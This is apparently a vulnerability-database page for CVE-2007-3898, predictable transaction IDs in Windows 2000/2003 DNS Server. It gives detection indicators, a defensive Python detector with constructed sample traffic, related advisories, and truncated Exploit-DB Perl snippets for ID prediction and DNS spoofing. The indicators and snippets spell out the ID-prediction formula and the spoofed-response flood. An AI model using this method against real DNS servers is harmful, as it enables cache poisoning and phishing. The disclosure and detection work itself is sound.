CVE-2007-3898
Published 2007-11-14
Priority P3 (51), medium; CVSS 2.0 base score 6.4
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:N/I:P/A:P
Exploit available
EPSS 55.13% (98.9th percentile)
The DNS server in Microsoft Windows 2000 Server SP4, and Server 2003 SP1 and SP2, uses predictable transaction IDs when querying other DNS servers, which allows remote attackers to spoof DNS replies, poison the DNS cache, and facilitate further attack vectors.
Detection & IOCs (extracted from sources)
- Windows DNS Server TRXID predictability: the highest two bits of the transaction ID are always 0, and the ID follows a structured pattern with fields M (bits 13-11), C (bits 10-3) and L (bits 2-0). Detect anomalous DNS transaction ID sequences where C mod 8 == 7 and the subsequent IDs match the 8 predicted values.
- Detect DNS cache poisoning attempts: monitor for a burst of up to 500 spoofed UDP DNS responses (source port 53) sent to a target DNS server's query port in rapid succession, all with incrementing transaction IDs drawn from a predicted base set of 8 values.
- The exploit probes the target DNS server by sending recursive NS queries for a controlled zone (e.g., *.cache-poisoning.net) to observe the returned transaction IDs and infer the TRXID sequence. Monitor for repeated recursive DNS queries from a single source to unusual or attacker-controlled zones.
- The exploit pre-caches the NS record for the target domain before spoofing, using a preliminary NS query. Detect DNS servers receiving an NS query for a domain immediately followed by a flood of spoofed A-record responses for the same domain.
- The exploit tracks 8 parallel TRXID sequences (num_seq = 8), consistent with Windows DNS using 8 RC4 cipher instances for ID generation. DNS traffic whose IDs cycle across exactly 8 arithmetic progressions is indicative of exploitation.
- Windows DNS Server TRXID prediction: the next TRXID is one of 8 values computed as (m << 11) | (((C + 1) mod 256) << 3) for m in 0..7. IDS/IPS rules should flag DNS responses whose IDs match this predictable pattern when sent to a known Windows DNS server.
- The exploit targets Windows DNS Server's use of CryptGenRandom with 8 RC4 instances for transaction ID generation. The TRXID prediction only works when the highest two bits of the observed TRXID are 0; non-zero high bits indicate a non-Windows target or an endianness mismatch.
- Prediction requires observing a TRXID where C mod 8 == 7; otherwise the attacker must wait for the counter to reach that state before the next ID can be predicted.
- The exploit assumes the target DNS server always uses the first nameserver returned for a domain when forwarding recursive queries, a Windows DNS Server-specific behavior leveraged to maximize spoofing success.
- The maximum tolerated difference between two subsequent IDs in the same sequence is 500; IDs diverging beyond this threshold are not attributed to the same sequence, which limits the prediction window.
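The detection items above can be turned into a concrete check. The following is an added example (not code from the page or from the original exploit): it splits an observed transaction ID into the M/C/L fields described above, computes the 8 predicted base values once C mod 8 == 7 is seen, and flags a burst of inbound port-53 responses whose IDs fall within the 500-ID window above those bases. The capture lines, their format and the addresses are constructed for the example.

```python
import re

# Field layout from the advisory: bits 15-14 zero, M = bits 13-11, C = bits 10-3,
# L = bits 2-0. SPOOF_WINDOW is the 500-ID spread the IOC list says one sequence tolerates.
SPOOF_WINDOW = 500

def split_trxid(trxid):
    """Return (M, C, L), or None when the top two bits are set (not the Windows layout)."""
    if trxid >> 14:
        return None
    return (trxid >> 11) & 7, (trxid >> 3) & 0xFF, trxid & 7

def predicted_next_ids(trxid):
    """The 8 candidate next IDs once C mod 8 == 7 has been observed; empty set otherwise."""
    fields = split_trxid(trxid)
    if fields is None or fields[1] % 8 != 7:
        return set()
    c = fields[1]
    return {(m << 11) | (((c + 1) % 256) << 3) for m in range(8)}

# Constructed capture-line format: "udp SRC:PORT -> DST:PORT id=0xHHHH"
LOG_RE = re.compile(r"udp \S+:(\d+) -> \S+:\d+ id=0x([0-9A-Fa-f]{4})")

def parse_line(line):
    """Extract (src_port, trxid) from one capture line, or None if it does not match."""
    m = LOG_RE.search(line)
    return (int(m.group(1)), int(m.group(2), 16)) if m else None

def flag_spoof_burst(last_query_id, lines, min_hits=4):
    """Count inbound port-53 responses whose ID lies within SPOOF_WINDOW above a
    predicted base value; return (flagged, hit_count)."""
    bases = predicted_next_ids(last_query_id)
    if not bases:
        return False, 0  # server not in the predictable state, nothing to match
    hits = 0
    for line in lines:
        parsed = parse_line(line)
        if parsed is None or parsed[0] != 53:
            continue  # not a DNS response from source port 53
        if any(0 <= parsed[1] - b < SPOOF_WINDOW for b in bases):
            hits += 1
    return hits >= min_hits, hits

# Constructed sample: last outbound query ID 0x09FA (M=1, C=63, L=2, so C mod 8 == 7),
# then a burst of inbound "responses" to the monitored server 192.0.2.10.
LAST_QUERY_ID = 0x09FA
SAMPLE_CAPTURE = [
    "udp 198.51.100.7:53 -> 192.0.2.10:1025 id=0x0A00",
    "udp 198.51.100.7:53 -> 192.0.2.10:1025 id=0x0A01",
    "udp 198.51.100.7:53 -> 192.0.2.10:1025 id=0x1200",
    "udp 198.51.100.7:53 -> 192.0.2.10:1025 id=0x1203",
    "udp 198.51.100.7:53 -> 192.0.2.10:1025 id=0x7B3C",  # legitimate reply, outside the set
    "udp 203.0.113.5:4444 -> 192.0.2.10:1025 id=0x0A00",  # wrong source port, ignored
]
```

`flag_spoof_burst(LAST_QUERY_ID, SAMPLE_CAPTURE)` returns `(True, 4)` on the sample: four responses sit inside predicted windows and the legitimate reply does not.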
GHSA
- GHSA-8j6p-hw9p-9vh5 (CVE-2008-6194, MEDIUM, ghsa_unreviewed, 2022-05-14, CVSS 6.4): Memory leak in the DNS server in Microsoft Windows allows remote attackers to cause a denial of service (memory consumption) via DNS packets. NOTE: this issue reportedly exists because of an incorrect fix for CVE-2007-3898.
- GHSA-5m49-9cvp-c8jj (CVE-2007-3898, MEDIUM, ghsa_unreviewed, 2022-05-01): The DNS server in Microsoft Windows 2000 Server SP4, and Server 2003 SP1 and SP2, uses predictable transaction IDs when querying other DNS servers, which allows remote attackers to spoof DNS replies, poison the DNS cache, and facilitate further attack vectors.
- GHSA-qwjc-5gc9-97xh (CVE-2007-6043, MEDIUM, CWE-200, ghsa_unreviewed, 2022-05-01, CVSS 6.4): The CryptGenRandom function in Microsoft Windows 2000 generates predictable values, which makes it easier for context-dependent attackers to reduce the effectiveness of cryptographic mechanisms, as demonstrated by attacks on (1) forward security and (2) backward security, related to use of eight instances of the RC4 cipher, and possibly a related issue to CVE-2007-3898.
No detection rules found.
Exploit-DB
Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (1)
exploitdb · 2007-11-13 · CVE-2007-3898
---
source: https://www.securityfocus.com/bid/25919/info
Microsoft Windows DNS Server is prone to a vulnerability that permits an attacker to spoof responses to DNS requests.
A successful attack will corrupt the DNS cache with attacker-specified content. This may aid in further attacks such as phishing.

```perl
$TRXID=$ARGV[0];
$zero=$TRXID>>14;
if ($zero!=0)
{
print "Highest two bits are not 0.\n";
print "Is this really Windows DNS server? check endian issues!\n";
exit(0);
}
$M=($TRXID>>11) & 7;
$C=($TRXID>>3) & 0xFF;
$L=$TRXID & 7;
if (($C % 8)!=7)
{
print "C mod 8 is not 7 - can't predict next TRXID.\n";
print "Wait for C mod 8 to become 7\n";
exit(0);
}
print "Next TRXID is one of the following 8 values:\n";
for ($m=0;$m<8;$
```
Exploit-DB
Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (2)
exploitdb · 2007-11-13 · CVE-2007-3898
---
source: https://www.securityfocus.com/bid/25919/info
Microsoft Windows DNS Server is prone to a vulnerability that permits an attacker to spoof responses to DNS requests.
A successful attack will corrupt the DNS cache with attacker-specified content. This may aid in further attacks such as phishing.

```perl
#!/usr/bin/perl
use strict;
use Net::DNS;
use Net::DNS::Nameserver;
use IO::Socket;
use Net::RawIP;
sub usage {
print ("$0 is a program for DNS id spoofing.\n");
print ("usage: $0 target tospoof ourzone port\n");
print ("Example: $0 ns1.belbone.be www.hotmail.com .cache-poisoning.net 1025\n");
}
my($target, $tospoof, $ourzone, $query_port) = @ARGV;
$tospoof = "www.hotmail.com" unless($tospoof);
$ourzone = ".cache-poiso
```
No writeups or analysis indexed.
References
- http://secunia.com/advisories/27584
- http://securityreason.com/securityalert/3373
- http://www.kb.cert.org/vuls/id/484649
- http://www.scanit.be/advisory-2007-11-14.html
- http://www.securityfocus.com/archive/1/483635/100/0/threaded
- http://www.securityfocus.com/archive/1/483698/100/0/threaded
- http://www.securityfocus.com/archive/1/484186/100/0/threaded
- http://www.securityfocus.com/bid/25919
- http://www.securitytracker.com/id?1018942
- http://www.trusteer.com/docs/windowsdns.html
- http://www.us-cert.gov/cas/techalerts/TA07-317A.html
- http://www.vupen.com/english/advisories/2007/3848
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2007/ms07-062
- https://exchange.xforce.ibmcloud.com/vulnerabilities/36805
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A4395